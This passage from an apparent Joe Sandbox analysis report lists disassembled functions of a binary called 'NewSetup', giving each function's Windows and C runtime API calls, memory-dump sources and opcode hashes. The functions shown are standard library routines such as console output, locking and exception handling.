                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Yarn
                                                                                                      • String ID: e.$$|=!e.$
                                                                                                      • API String ID: 1767336200-2625508016
                                                                                                      • Opcode ID: 132bd353f5c1f9c1909503c862231be774a838f2f79cb6b85a8544dc48bb5763
                                                                                                      • Instruction ID: 823995cb09c1e9c1722c51f467b18873b233a5def4e415e66f5dc0e170e1bc7e
                                                                                                      • Opcode Fuzzy Hash: 132bd353f5c1f9c1909503c862231be774a838f2f79cb6b85a8544dc48bb5763
                                                                                                      • Instruction Fuzzy Hash: A1E06D223283107FEB0CBA66EC52BBA73DCCB14B60F10002EF90A8A5C1ED10BD944A95
                                                                                                      Function 00236940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002369DC,00000000,?,0024D2B0,?,?,?,00236913,00000004,InitializeCriticalSectionEx,00240D34,00240D3C), ref: 0023694D
                                                                                                      • GetLastError.KERNEL32(?,002369DC,00000000,?,0024D2B0,?,?,?,00236913,00000004,InitializeCriticalSectionEx,00240D34,00240D3C,00000000,?,0022BBBC), ref: 00236957
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0023697F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                      • Opcode ID: ce3a770960a617fb4fcd2bd548a07136e9d7013afc0d232adfb4ce46afc05ef6
                                                                                                      • Instruction ID: 6a9e1b5a4484faa21fb449248e11a8719031191cbb7d990c358602d5bb14f7f0
                                                                                                      • Opcode Fuzzy Hash: ce3a770960a617fb4fcd2bd548a07136e9d7013afc0d232adfb4ce46afc05ef6
                                                                                                      • Instruction Fuzzy Hash: 71E01AB07A0205BAEF201F61EC4EB6C3A59AB52B91F144420F94DA88E0DB71EC649945
                                                                                                      Function 00233F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00234001
                                                                                                        • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00234253
                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00234299
                                                                                                      • GetLastError.KERNEL32 ref: 0023433C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2112829910-0
                                                                                                      • Opcode ID: ee51059b929a84c719b07eb4b201340fe84c5556f77e3b61d221b5b0bf4f1785
                                                                                                      • Instruction ID: cf4cfc4086c25db6081b938e6d7dfa85e89ba01ebc346c445ed138fe4616d60c
                                                                                                      • Opcode Fuzzy Hash: ee51059b929a84c719b07eb4b201340fe84c5556f77e3b61d221b5b0bf4f1785
                                                                                                      • Instruction Fuzzy Hash: 51D198B5E102589FCF14DFE8D884AEDBBB4FF09314F2841AAE856EB351D630A951CB50
                                                                                                      Function 0022B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: fcf5381fba0fbea99365acfeb520a1903e64be7872e23b9eaa13e6ccc3fcc8c1
                                                                                                      • Instruction ID: 034b16a4f13fa947d55aff8dcd24da90a7d3d2e20afae49f63686827a2a3e9a8
                                                                                                      • Opcode Fuzzy Hash: fcf5381fba0fbea99365acfeb520a1903e64be7872e23b9eaa13e6ccc3fcc8c1
                                                                                                      • Instruction Fuzzy Hash: 4F51D471A24622FFDB26DFD0E891BAA73A4EF04710F14456DEC0657291D771ECA0CB90
                                                                                                      Function 00217220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 002172C5
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00217395
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002173A3
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002173B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2261580123-0
                                                                                                      • Opcode ID: e6d8ea7b23a051676a03a05b8255f8748ca6dc14393462ec70bdfff5eafa1f8b
                                                                                                      • Instruction ID: 53f3afac642ca10e6f550c36a43b782421919c164c98c5a4c32175135559ee24
                                                                                                      • Opcode Fuzzy Hash: e6d8ea7b23a051676a03a05b8255f8748ca6dc14393462ec70bdfff5eafa1f8b
                                                                                                      • Instruction Fuzzy Hash: 4141F5B19143068BDB21DF24C845BEFB7F4BFA4320F144679D82647691EB34E8A5CB91
                                                                                                      Function 00214460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00214495
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 002144B2
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 002144D3
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00214580
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID:
                                                                                                      • API String ID: 593203224-0
                                                                                                      • Opcode ID: 4c4577c80ff28a873996e4f01808e6e58d543981ea111ce3d0fbf0e81321b04a
                                                                                                      • Instruction ID: e6ab17f6e347e09cf7fdc4472a1e28c73b8c9433c6b3dd0c75654b8eab4e6da3
                                                                                                      • Opcode Fuzzy Hash: 4c4577c80ff28a873996e4f01808e6e58d543981ea111ce3d0fbf0e81321b04a
                                                                                                      • Instruction Fuzzy Hash: CF418875D112198FCB10EF98E848BEDBBF5FB69320F544229E80967391D734A990CFA1
                                                                                                      Function 00231DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
                                                                                                      • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00231E2A
                                                                                                      • __dosmaperr.LIBCMT ref: 00231E31
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00231E6B
                                                                                                      • __dosmaperr.LIBCMT ref: 00231E72
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1913693674-0
                                                                                                      • Opcode ID: 0fb775894408ad03ef7fe822f3ebe66d5f682f02336f217724643bf770e3dff0
                                                                                                      • Instruction ID: 7da396cc7891a934dd7dd2fca6d96b71e0c405be5a711f71efc3f522c5382952
                                                                                                      • Opcode Fuzzy Hash: 0fb775894408ad03ef7fe822f3ebe66d5f682f02336f217724643bf770e3dff0
                                                                                                      • Instruction Fuzzy Hash: DC21B0B1624226BFDB20AFA5DC8596BB7A9FF05364F108519FC1997111D732EC308BA0
                                                                                                      Function 00222BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 770a8837a108b879bc0b22d914b321b23d31bbb30dd47a2bd62ca2245769635e
                                                                                                      • Instruction ID: a88b84bcb89b3d6ac77efd8ecf4a730f2091b902b3f6a34e0560bcdb53c8b392
                                                                                                      • Opcode Fuzzy Hash: 770a8837a108b879bc0b22d914b321b23d31bbb30dd47a2bd62ca2245769635e
                                                                                                      • Instruction Fuzzy Hash: F021C231224236FF8B20AFE5FC8096AB7ACFF403647114516F855A7210EB32EC348BA0
                                                                                                      Function 002331BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002331C6
                                                                                                        • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002331FE
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023321E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 158306478-0
                                                                                                      • Opcode ID: 3c0e278ba531cdcd7deb84faa85c50a46b0177f406b54833118af2d1f30d357c
                                                                                                      • Instruction ID: 8ebc08137a9a41f3131f248e9e765ac421d26b996f6471121d3e4ebfa39738f5
                                                                                                      • Opcode Fuzzy Hash: 3c0e278ba531cdcd7deb84faa85c50a46b0177f406b54833118af2d1f30d357c
                                                                                                      • Instruction Fuzzy Hash: 0811C4F65316267EA7126BB5BC8ECBF6A5CDE86795B100015FE01D1100FFA4DF2085B2
                                                                                                      Function 0021E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021E899
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021E8A3
                                                                                                      • int.LIBCPMT ref: 0021E8BA
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0021C1F6
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0021C210
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021E914
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                      • String ID:
                                                                                                      • API String ID: 1383202999-0
                                                                                                      • Opcode ID: ada35f406293fcb543c6a82799591b507e54fac0e5fc7f408bf9b3c0b3d5f09f
                                                                                                      • Instruction ID: c11387cb3629fc40d0de1bf19bab857dd9cb23d7c0e913788dbd39b0da79b095
                                                                                                      • Opcode Fuzzy Hash: ada35f406293fcb543c6a82799591b507e54fac0e5fc7f408bf9b3c0b3d5f09f
                                                                                                      • Instruction Fuzzy Hash: 891102759251159BCF05EF64C9056FDBBF1AFA4720F350008E8116B292CF749AA0CF81
                                                                                                      Function 0023ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000), ref: 0023ADB7
                                                                                                      • GetLastError.KERNEL32(?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?,?,?,00233CD6,00000000), ref: 0023ADC3
                                                                                                        • Part of subcall function 0023AE20: CloseHandle.KERNEL32(FFFFFFFE,0023ADD3,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?,?), ref: 0023AE30
                                                                                                      • ___initconout.LIBCMT ref: 0023ADD3
                                                                                                        • Part of subcall function 0023ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0023AD91,0023A2DC,?,?,00234390,?,00000000,00000000,?), ref: 0023AE08
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?), ref: 0023ADE8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744216297-0
                                                                                                      • Opcode ID: 623dc61cc681e19b9e34b1fd302f50be916f7a1de0cbcc683530875fd19ca169
                                                                                                      • Instruction ID: 157d96b3f2fbdec397b18e64c51d73b833da8490f18b74337e6051ad5768cce3
                                                                                                      • Opcode Fuzzy Hash: 623dc61cc681e19b9e34b1fd302f50be916f7a1de0cbcc683530875fd19ca169
                                                                                                      • Instruction Fuzzy Hash: 5AF0127A510119BBCF622FD5FC0C99A3F26FF46761F004021FD4885120D7728C609B92
                                                                                                      Function 002204F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00220507
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00220516
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0022051F
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0022052C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: 095853ed0b714497ddfb9c9fee31804be37d140315b2ca83479760357136bf5c
                                                                                                      • Instruction ID: 49369ffbd73760dc1cf695b56936e73221517f2c8ea5ca94d76ef9d35779b183
                                                                                                      • Opcode Fuzzy Hash: 095853ed0b714497ddfb9c9fee31804be37d140315b2ca83479760357136bf5c
                                                                                                      • Instruction Fuzzy Hash: 31F05F74D1020DEBCB00DFB4EA8D99EBBF4FF1E204B914996A412E6110EA30AA449B51
                                                                                                      Function 0022B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0022B893,?,?,00000000,00000000,00000000,?), ref: 0022B9B7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EncodePointer
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                      • Opcode ID: 65ae7ff31a9b50eb1353de552f992e536e0b6213a80a1921936a4757fe11187b
                                                                                                      • Instruction ID: 5611a6c02e564ee5fc3a0c5ff2e73d51f9bc7170177849487342f8150674240e
                                                                                                      • Opcode Fuzzy Hash: 65ae7ff31a9b50eb1353de552f992e536e0b6213a80a1921936a4757fe11187b
                                                                                                      • Instruction Fuzzy Hash: 1741593191021ABFCF16DF94EC81AAEBBB5BF48300F188159F91467211D73599A0DF91
                                                                                                      Function 0022B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0022B475
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3493665558-3733052814
                                                                                                      • Opcode ID: 650d2a0bc5fd89b9e10012f99383b6ebe8c3096f9cfbb22c7d9fcb288710c060
                                                                                                      • Instruction ID: f68dab7a159670663104e1dc03a8d38a35b707b22b24a98db861540d252582a3
                                                                                                      • Opcode Fuzzy Hash: 650d2a0bc5fd89b9e10012f99383b6ebe8c3096f9cfbb22c7d9fcb288710c060
                                                                                                      • Instruction Fuzzy Hash: DE31D27642022AFBCF279FD0E8849AA7B6AFF08315B58465AF9540D122C336DD71DB81
                                                                                                      Function 0021B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021B8B9
                                                                                                      • RaiseException.KERNEL32(?,?,?,?,?), ref: 0021B8DE
                                                                                                        • Part of subcall function 0022060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0021F354,00000000,?,?,?,0021F354,00213D4A,0024759C,00213D4A), ref: 0022066D
